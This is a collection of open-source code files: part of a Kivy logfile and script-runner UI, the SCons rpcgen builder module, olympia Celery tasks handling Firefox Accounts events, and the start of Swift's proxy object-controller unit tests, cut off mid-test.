'''
if value:
Clock.schedule_interval(self.poll_logfile, LOGFILE_POLL_INTERVAL)
else:
Clock.unschedule(self.poll_logfile)
def poll_logfile(self, *args):
'''
Sends the API command to poll the log file
'''
self.rc_api.getLogfile()
def set_logfile_level(self, instance, level):
'''
Sends the API command to set the logfile level
:param instance: the widget instance performing the call
:type instance: widget
:param level: the numeric log file level
:type level: int
'''
self.rc_api.setLogfileLevel(level, None, self.on_set_logfile_level_error)
def on_set_logfile_level_error(self, detail):
'''
Callback for error condition of setting the logfile
:param detail: the description of the error
:type detail: string
'''
toast('Error Setting Logfile Level:\n\n{}'.format(detail), length_long=True)
def run_script(self, *args):
'''
Sends the API command to re-run the script.
'''
self.rc_api.runScript(self.on_run_script_complete, self.on_run_script_error)
def on_run_script_complete(self, result):
'''
Callback when the script has been restarted successfully
:param result: the result of the API call
:type result: dict
'''
toast('Script restarted')
def on_run_script_error(self, detail):
'''
Callback when the script fails to restart
:param detail: the description of the error
:type detail: string
'''
toast('Error Running Script:\n\n{}'.format(str(detail)), length_long=True)
class LuaCodeInput(CodeInput):
'''
Wrapper class for CodeInput that sets the Lua Lexer
'''
def __init__(self, **kwargs):
super(LuaCodeInput, self).__init__(**kwargs)
self.lexer = lexers.get_lexer_by_name('lua')
| gpl-3.0 |
frewsxcv/keyczar | cpp/src/tools/scons/scons-local-1.2.0.d20090223/SCons/Tool/rpcgen.py | 19 | 2876 | """SCons.Tool.rpcgen
Tool-specific initialization for RPCGEN tools.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/rpcgen.py 4043 2009/02/23 09:06:45 scons"
from SCons.Builder import Builder
import SCons.Util
cmd = "cd ${SOURCE.dir} && $RPCGEN -%s $RPCGENFLAGS %s -o ${TARGET.abspath} ${SOURCE.file}"
rpcgen_client = cmd % ('l', '$RPCGENCLIENTFLAGS')
rpcgen_header = cmd % ('h', '$RPCGENHEADERFLAGS')
rpcgen_service = cmd % ('m', '$RPCGENSERVICEFLAGS')
rpcgen_xdr = cmd % ('c', '$RPCGENXDRFLAGS')
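# For illustration, rpcgen_client above expands to:
#   cd ${SOURCE.dir} && $RPCGEN -l $RPCGENCLIENTFLAGS -o ${TARGET.abspath} ${SOURCE.file}
# with the remaining $-variables substituted by SCons at build time.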
def generate(env):
"Add RPCGEN Builders and construction variables for an Environment."
client = Builder(action=rpcgen_client, suffix='_clnt.c', src_suffix='.x')
header = Builder(action=rpcgen_header, suffix='.h', src_suffix='.x')
service = Builder(action=rpcgen_service, suffix='_svc.c', src_suffix='.x')
xdr = Builder(action=rpcgen_xdr, suffix='_xdr.c', src_suffix='.x')
env.Append(BUILDERS={'RPCGenClient' : client,
'RPCGenHeader' : header,
'RPCGenService' : service,
'RPCGenXDR' : xdr})
env['RPCGEN'] = 'rpcgen'
env['RPCGENFLAGS'] = SCons.Util.CLVar('')
env['RPCGENCLIENTFLAGS'] = SCons.Util.CLVar('')
env['RPCGENHEADERFLAGS'] = SCons.Util.CLVar('')
env['RPCGENSERVICEFLAGS'] = SCons.Util.CLVar('')
env['RPCGENXDRFLAGS'] = SCons.Util.CLVar('')
def exists(env):
return env.Detect('rpcgen')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| apache-2.0 |
eviljeff/olympia | src/olympia/accounts/tasks.py | 2 | 1958 | import functools
from datetime import datetime
from waffle import switch_is_active
import olympia.core.logger
from olympia.amo.celery import task
from olympia.amo.decorators import use_primary_db
from olympia.users.models import UserProfile
log = olympia.core.logger.getLogger('z.accounts')
def user_profile_from_uid(f):
@functools.wraps(f)
def wrapper(uid, timestamp, *args, **kw):
try:
timestamp = datetime.fromtimestamp(timestamp)
profile = UserProfile.objects.get(fxa_id=uid)
return f(profile, timestamp, *args, **kw)
except ValueError as e:
log.warning(e)
except UserProfile.MultipleObjectsReturned:
log.warning('Multiple profile matches for FxA id %s' % uid)
except UserProfile.DoesNotExist:
log.info('No profile match for FxA id %s' % uid)
return wrapper
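# Call-path sketch (values are illustrative): Celery delivers the FxA event
# payload as (uid, timestamp, ...); the decorator resolves the uid to a
# UserProfile and converts the epoch timestamp to a datetime, e.g.
#
#   primary_email_change_event('fxa-uid-123', 1560000000, 'new@example.com')
#   # -> wrapped body runs with (profile, datetime(2019, ...), 'new@example.com')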
@task
@use_primary_db
@user_profile_from_uid
def primary_email_change_event(profile, changed_date, email):
"""Process the primaryEmailChangedEvent."""
if (not profile.email_changed or
profile.email_changed < changed_date):
profile.update(email=email, email_changed=changed_date)
log.info(
'Account pk [%s] email [%s] changed from FxA on %s' % (
profile.id, email, changed_date))
else:
log.warning('Account pk [%s] email updated ignored, %s > %s' %
(profile.id, profile.email_changed, changed_date))
@task
@use_primary_db
@user_profile_from_uid
def delete_user_event(user, deleted_date):
"""Process the delete user event."""
if switch_is_active('fxa-account-delete'):
user.delete(addon_msg='Deleted via FxA account deletion')
log.info(
'Account pk [%s] deleted from FxA on %s' % (user.id, deleted_date))
else:
log.info(
f'Skipping deletion from FxA for account [{user.id}] because '
'waffle inactive')
| bsd-3-clause |
matthewoliver/swift | test/unit/proxy/controllers/test_obj.py | 2 | 211683 | #!/usr/bin/env python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import email.parser
import itertools
import math
import random
import time
import unittest
from collections import defaultdict
from contextlib import contextmanager
import json
from hashlib import md5
import mock
from eventlet import Timeout
from six import BytesIO
from six.moves import range
import swift
from swift.common import utils, swob, exceptions
from swift.common.exceptions import ChunkWriteTimeout
from swift.common.utils import Timestamp, list_from_csv
from swift.proxy import server as proxy_server
from swift.proxy.controllers import obj
from swift.proxy.controllers.base import \
get_container_info as _real_get_container_info
from swift.common.storage_policy import POLICIES, ECDriverError, \
StoragePolicy, ECStoragePolicy
from test.unit import FakeRing, FakeMemcache, fake_http_connect, \
debug_logger, patch_policies, SlowBody, FakeStatus, \
DEFAULT_TEST_EC_TYPE, encode_frag_archive_bodies, make_ec_object_stub, \
fake_ec_node_response, StubResponse, mocked_http_conn
from test.unit.proxy.test_server import node_error_count
def unchunk_body(chunked_body):
body = ''
remaining = chunked_body
while remaining:
hex_length, remaining = remaining.split('\r\n', 1)
length = int(hex_length, 16)
body += remaining[:length]
remaining = remaining[length + 2:]
return body
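# A minimal illustration (hypothetical payload) of the chunked framing that
# unchunk_body() reverses; each chunk is "<hex length>\r\n<data>\r\n" and the
# stream ends with a zero-length chunk:
#
#   >>> unchunk_body('4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n')
#   'Wikipedia'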
@contextmanager
def set_http_connect(*args, **kwargs):
old_connect = swift.proxy.controllers.base.http_connect
new_connect = fake_http_connect(*args, **kwargs)
try:
swift.proxy.controllers.base.http_connect = new_connect
swift.proxy.controllers.obj.http_connect = new_connect
swift.proxy.controllers.account.http_connect = new_connect
swift.proxy.controllers.container.http_connect = new_connect
yield new_connect
left_over_status = list(new_connect.code_iter)
if left_over_status:
raise AssertionError('left over status %r' % left_over_status)
finally:
swift.proxy.controllers.base.http_connect = old_connect
swift.proxy.controllers.obj.http_connect = old_connect
swift.proxy.controllers.account.http_connect = old_connect
swift.proxy.controllers.container.http_connect = old_connect
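# Usage sketch (statuses are illustrative): each stubbed status is consumed by
# one backend request, and any left-over status raises AssertionError on exit:
#
#   with set_http_connect(201, 201, 201):
#       resp = req.get_response(self.app)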
class PatchedObjControllerApp(proxy_server.Application):
"""
This patch is just a hook over the proxy server's __call__ to ensure
that calls to get_container_info will return the stubbed value for
container_info if it's a container info call.
"""
container_info = {}
per_container_info = {}
def __call__(self, *args, **kwargs):
def _fake_get_container_info(env, app, swift_source=None):
_vrs, account, container, _junk = utils.split_path(
env['PATH_INFO'], 3, 4)
# Seed the cache with our container info so that the real
# get_container_info finds it.
ic = env.setdefault('swift.infocache', {})
cache_key = "container/%s/%s" % (account, container)
old_value = ic.get(cache_key)
# Copy the container info so we don't hand out a reference to a
# mutable thing that's set up only once at compile time. Nothing
# *should* mutate it, but it's better to be paranoid than wrong.
if container in self.per_container_info:
ic[cache_key] = self.per_container_info[container].copy()
else:
ic[cache_key] = self.container_info.copy()
real_info = _real_get_container_info(env, app, swift_source)
if old_value is None:
del ic[cache_key]
else:
ic[cache_key] = old_value
return real_info
with mock.patch('swift.proxy.server.get_container_info',
new=_fake_get_container_info), \
mock.patch('swift.proxy.controllers.base.get_container_info',
new=_fake_get_container_info):
return super(
PatchedObjControllerApp, self).__call__(*args, **kwargs)
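# Usage sketch: tests mutate the stub attributes defined above before issuing
# a request, e.g. (policy index is illustrative):
#
#   self.app.container_info['storage_policy'] = '1'
#   resp = req.get_response(self.app)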
def make_footers_callback(body=None):
# helper method to create a footers callback that will generate some fake
# footer metadata
cont_etag = 'container update etag may differ'
crypto_etag = '20242af0cd21dd7195a10483eb7472c9'
etag_crypto_meta = \
'{"cipher": "AES_CTR_256", "iv": "sD+PSw/DfqYwpsVGSo0GEw=="}'
etag = md5(body).hexdigest() if body is not None else None
footers_to_add = {
'X-Object-Sysmeta-Container-Update-Override-Etag': cont_etag,
'X-Object-Sysmeta-Crypto-Etag': crypto_etag,
'X-Object-Sysmeta-Crypto-Meta-Etag': etag_crypto_meta,
'X-I-Feel-Lucky': 'Not blocked',
'Etag': etag}
def footers_callback(footers):
footers.update(footers_to_add)
return footers_callback
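# Usage sketch: the returned callback mutates a footers dict in place, the
# same way the proxy drives the 'swift.callback.update_footers' hook:
#
#   footers = {}
#   make_footers_callback(body='data')(footers)
#   # footers now holds the stub Etag/crypto metadata defined above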
class BaseObjectControllerMixin(object):
container_info = {
'status': 200,
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
# this needs to be set on the test case
controller_cls = None
def setUp(self):
# set up fake rings with handoffs
for policy in POLICIES:
policy.object_ring.max_more_nodes = policy.object_ring.replicas
self.logger = debug_logger('proxy-server')
self.logger.thread_locals = ('txn1', '127.0.0.2')
# increase connection timeout to avoid intermittent failures
conf = {'conn_timeout': 1.0}
self.app = PatchedObjControllerApp(
conf, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
# you can over-ride the container_info just by setting it on the app
# (see PatchedObjControllerApp for details)
self.app.container_info = dict(self.container_info)
# default policy and ring references
self.policy = POLICIES.default
self.obj_ring = self.policy.object_ring
self._ts_iter = (utils.Timestamp(t) for t in
itertools.count(int(time.time())))
def ts(self):
return next(self._ts_iter)
def replicas(self, policy=None):
policy = policy or POLICIES.default
return policy.object_ring.replicas
def quorum(self, policy=None):
policy = policy or POLICIES.default
return policy.quorum
def test_iter_nodes_local_first_noops_when_no_affinity(self):
# this test needs a stable node order - most don't
self.app.sort_nodes = lambda l, *args, **kwargs: l
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy = self.policy
self.app.get_policy_options(policy).write_affinity_is_local_fn = None
object_ring = policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
self.maxDiff = None
self.assertEqual(all_nodes, local_first_nodes)
def test_iter_nodes_local_first_moves_locals_first(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
# we'll write to one more than replica count local nodes
policy_conf.write_affinity_node_count_fn = lambda r: r + 1
object_ring = self.policy.object_ring
# make our fake ring have plenty of nodes, and not get limited
# artificially by the proxy max request node count
object_ring.max_more_nodes = 100000
# nothing magic about * 2 + 3, just a way to make it bigger
self.app.request_node_count = lambda r: r * 2 + 3
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
# limit to the number we're going to look at in this request
nodes_requested = self.app.request_node_count(object_ring.replicas)
all_nodes = all_nodes[:nodes_requested]
# make sure we have enough local nodes (sanity)
all_local_nodes = [n for n in all_nodes if
policy_conf.write_affinity_is_local_fn(n)]
self.assertGreaterEqual(len(all_local_nodes), self.replicas() + 1)
# finally, create the local_first_nodes iter and flatten it out
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
# the local nodes move up in the ordering
self.assertEqual([1] * (self.replicas() + 1), [
node['region'] for node in local_first_nodes[
:self.replicas() + 1]])
# we don't skip any nodes
self.assertEqual(len(all_nodes), len(local_first_nodes))
self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
def test_iter_nodes_local_first_best_effort(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
object_ring = self.policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
# we won't have quite enough local nodes...
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
all_local_nodes = [n for n in all_nodes if
policy_conf.write_affinity_is_local_fn(n)]
self.assertEqual(len(all_local_nodes), self.replicas())
# but the local nodes we do have are at the front of the local iter
first_n_local_first_nodes = local_first_nodes[:len(all_local_nodes)]
self.assertEqual(sorted(all_local_nodes),
sorted(first_n_local_first_nodes))
# but we *still* don't *skip* any nodes
self.assertEqual(len(all_nodes), len(local_first_nodes))
self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
def test_iter_nodes_local_handoff_first_noops_when_no_affinity(self):
# this test needs a stable node order - most don't
self.app.sort_nodes = lambda l, *args, **kwargs: l
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy = self.policy
self.app.get_policy_options(policy).write_affinity_is_local_fn = None
object_ring = policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.maxDiff = None
self.assertEqual(all_nodes, local_first_nodes)
def test_iter_nodes_handoff_local_first_default(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
object_ring = self.policy.object_ring
primary_nodes = object_ring.get_part_nodes(1)
handoff_nodes_iter = object_ring.get_more_nodes(1)
all_nodes = primary_nodes + list(handoff_nodes_iter)
handoff_nodes_iter = object_ring.get_more_nodes(1)
local_handoffs = [n for n in handoff_nodes_iter if
policy_conf.write_affinity_is_local_fn(n)]
preferred_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
first_primary_nodes = preferred_nodes[:len(primary_nodes)]
self.assertEqual(sorted(primary_nodes), sorted(first_primary_nodes))
handoff_count = self.replicas() - len(primary_nodes)
first_handoffs = preferred_nodes[len(primary_nodes):][:handoff_count]
self.assertEqual(first_handoffs, local_handoffs[:handoff_count])
def test_iter_nodes_handoff_local_first_non_default(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
policy_conf.write_affinity_handoff_delete_count = 1
object_ring = self.policy.object_ring
primary_nodes = object_ring.get_part_nodes(1)
handoff_nodes_iter = object_ring.get_more_nodes(1)
all_nodes = primary_nodes + list(handoff_nodes_iter)
handoff_nodes_iter = object_ring.get_more_nodes(1)
local_handoffs = [n for n in handoff_nodes_iter if
policy_conf.write_affinity_is_local_fn(n)]
preferred_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
first_primary_nodes = preferred_nodes[:len(primary_nodes)]
self.assertEqual(sorted(primary_nodes), sorted(first_primary_nodes))
handoff_count = policy_conf.write_affinity_handoff_delete_count
first_handoffs = preferred_nodes[len(primary_nodes):][:handoff_count]
self.assertEqual(first_handoffs, local_handoffs[:handoff_count])
def test_connect_put_node_timeout(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
req = swift.common.swob.Request.blank('/v1/a/c/o')
self.app.conn_timeout = 0.05
with set_http_connect(slow_connect=True):
nodes = [dict(ip='', port='', device='')]
res = controller._connect_put_node(nodes, '', req, {}, ('', ''))
self.assertIsNone(res)
def test_DELETE_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_missing_one(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [404] + [204] * (self.replicas() - 1)
random.shuffle(codes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_not_found(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [404] * (self.replicas() - 1) + [204]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_DELETE_mostly_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
mostly_204s = [204] * self.quorum()
codes = mostly_204s + [404] * (self.replicas() - len(mostly_204s))
self.assertEqual(len(codes), self.replicas())
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_mostly_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
mostly_404s = [404] * self.quorum()
codes = mostly_404s + [204] * (self.replicas() - len(mostly_404s))
self.assertEqual(len(codes), self.replicas())
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_DELETE_half_not_found_statuses(self):
self.obj_ring.set_replicas(4)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 404, 204):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_half_not_found_headers_and_body(self):
# Transformed responses have bogus bodies and headers, so make sure we
# send the client headers and body from a real node's response.
self.obj_ring.set_replicas(4)
status_codes = (404, 404, 204, 204)
bodies = ('not found', 'not found', '', '')
headers = [{}, {}, {'Pick-Me': 'yes'}, {'Pick-Me': 'yes'}]
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(*status_codes, body_iter=bodies,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
self.assertEqual(resp.headers.get('Pick-Me'), 'yes')
self.assertEqual(resp.body, '')
def test_DELETE_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
with set_http_connect(507, *codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_limits_expirer_queue_updates(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_expirer_DELETE_suppresses_expirer_queue_updates(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Backend-Clean-Expiring-Object-Queue': 'no'})
codes = [204] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
o_replicas = self.replicas()
self.assertEqual(counts, {
True: 0,
False: o_replicas,
None: 0,
})
# Make sure we're not sending any expirer-queue update headers here.
# Since we're not updating the expirer queue, these headers would be
# superfluous.
for headers in captured_headers:
self.assertNotIn('X-Delete-At-Container', headers)
self.assertNotIn('X-Delete-At-Partition', headers)
self.assertNotIn('X-Delete-At-Host', headers)
self.assertNotIn('X-Delete-At-Device', headers)
def test_DELETE_write_affinity_before_replication(self):
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_handoff_delete_count = self.replicas() / 2
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
handoff_count = policy_conf.write_affinity_handoff_delete_count
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas() + [404] * handoff_count
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_write_affinity_after_replication(self):
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_handoff_delete_count = self.replicas() / 2
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
handoff_count = policy_conf.write_affinity_handoff_delete_count
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = ([204] * (self.replicas() - handoff_count) +
[404] * handoff_count +
[204] * handoff_count)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_PUT_limits_expirer_queue_deletes(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'application/octet-stream'})
codes = [201] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, give_connect=capture_headers,
expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_POST_limits_expirer_queue_deletes(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='POST', body='',
headers={'Content-Type': 'application/octet-stream'})
codes = [201] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_POST_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_PUT_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_POST_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_PUT_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_POST_delete_at_non_integer(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_PUT_delete_at_non_integer(self):
t = str(int(time.time() - 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_POST_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_PUT_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_HEAD_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
def test_HEAD_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
with set_http_connect(*([200] * self.replicas())):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_HEAD_x_newest_different_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
timestamps = [next(ts) for i in range(self.replicas())]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(*([200] * self.replicas()),
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-timestamp'], newest_timestamp.normal)
def test_HEAD_x_newest_with_two_vector_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp.now(offset=offset)
for offset in itertools.count())
timestamps = [next(ts) for i in range(self.replicas())]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(*([200] * self.replicas()),
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-backend-timestamp'],
newest_timestamp.internal)
def test_HEAD_x_newest_with_some_missing(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
request_count = self.app.request_node_count(self.obj_ring.replicas)
backend_response_headers = [{
